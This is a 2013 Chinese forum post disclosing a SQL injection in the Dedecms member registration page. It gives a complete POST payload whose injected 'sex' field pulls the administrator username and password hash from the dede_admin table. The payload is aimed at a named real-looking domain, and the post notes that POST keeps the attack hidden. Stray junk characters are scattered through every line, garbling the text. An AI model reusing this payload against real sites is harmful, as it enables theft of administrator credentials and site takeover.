漏洞类型: SQL注射漏洞* g, b& }+ O+ c- [. a
简要描述:- |) B" W# C( s' n/ c
- I: R' \0 X0 y: V: P
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
2 m. x" ]& t# T. [. v' r原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.0 F' g* y7 t9 O6 y9 u
详细说明:跟这个漏洞
g; `& {+ [! L. N1 s
* n" b: i( I. U, B3 s( o SWooYun: Dedecms SQL注射导致审核机制绕过漏洞
& Q) H+ j6 _+ A5 E3 |是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.4 U6 Z4 u9 ^- {) v8 O
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
- m0 c$ e" s0 r l7 T' U8 \2 v
1 ?+ b% ^5 R# b1 `4 w% H1 uwww.political-security.com/member/reg_new.php3 U) P$ r: B. C ]9 ?
) F" M/ ?: j! j0 p) a* d/ i& g( N5 K
POST! y! t& d3 a4 R
0 w/ O4 J% @% X* x2 Z
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
2 ^. R$ K$ ?0 A/ t6 {userid=c4rp3nt3r&uname=c4rp3nt3r
! S7 P2 \1 L0 Z. w4 W&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
9 q/ y' q) L4 Y, `&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
0 h* |2 \' j, y(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
1 S( v) f+ a% @) j( ~%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对